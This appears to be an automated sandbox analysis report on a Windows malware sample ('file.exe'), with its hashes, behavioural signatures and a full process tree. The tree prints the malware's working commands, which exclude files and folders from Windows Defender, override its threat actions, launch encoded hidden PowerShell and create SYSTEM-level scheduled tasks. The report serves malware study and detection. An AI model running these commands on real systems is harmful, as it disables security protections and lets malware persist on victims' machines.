Analysis
-
max time kernel
112s -
max time network
114s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
06-02-2023 17:28
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
3d946d6453cad635dbcb3dc6c012dc55
-
SHA1
8e31f08676c6568af162907f36abc2a8fed6828d
-
SHA256
32f520de1063cb3d641d5dbd53e3b0110bfa885cc6121ba410ca64b1248a8e48
-
SHA512
062e0491375fe95788f027d70bc1e53afc2bb95cd2b772278c0268a405453db940b0ba19da9ba64da073510d1a25737c8e1a9d2be06edefd8c3fd1f716b1ad99
-
SSDEEP
196608:91Od6djzTVjLDbJFmhSN+YyyVlBlfVrhBtcJ1rNIw9Ta35Bn:3Od6L7JFmINflTVNPG1ZIoTe5Z
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Drops file in System32 directory 29 IoCs
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies system certificate store 2 TTPs 5 IoCs
-
Suspicious behavior: EnumeratesProcesses 44 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS6CE8.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS6FD6.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnhGWtCLn" /SC once /ST 09:29:57 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnhGWtCLn"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gnhGWtCLn"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "boytPmuAkKgmiEZYSe" /SC once /ST 17:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\bxOsRQN.exe\" X6 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\bxOsRQN.exeC:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\lPAIFilFZOpRFIX\bxOsRQN.exe X6 /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OKneYAAzclQU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OKneYAAzclQU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eCbNXTSQanJlC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\eCbNXTSQanJlC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vcfECUarZbUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vcfECUarZbUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wRLQelouU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\wRLQelouU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WoychCUlhHkYXpVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WoychCUlhHkYXpVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UIFvrSrxAzeYKEuX\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UIFvrSrxAzeYKEuX\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKneYAAzclQU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKneYAAzclQU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OKneYAAzclQU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZiLpQKvFpwQmACSzEAR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eCbNXTSQanJlC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\eCbNXTSQanJlC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vcfECUarZbUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vcfECUarZbUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRLQelouU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wRLQelouU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WoychCUlhHkYXpVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WoychCUlhHkYXpVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\MiBciKVvopIpRLyaf /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UIFvrSrxAzeYKEuX /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UIFvrSrxAzeYKEuX /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gdADGYYzK" /SC once /ST 05:27:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gdADGYYzK"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gdADGYYzK"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tRsUEOedRvIwZoOQu" /SC once /ST 09:07:18 /RU "SYSTEM" /TR "\"C:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\hOSybKN.exe\" nL /site_id 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "tRsUEOedRvIwZoOQu"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\hOSybKN.exeC:\Windows\Temp\UIFvrSrxAzeYKEuX\VEdIRfVaNlgFjwC\hOSybKN.exe nL /site_id 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "boytPmuAkKgmiEZYSe"2⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\wRLQelouU\GXlhvf.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "xhAFLspUEGhlntx" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "xhAFLspUEGhlntx2" /F /xml "C:\Program Files (x86)\wRLQelouU\aZWxSYx.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
-
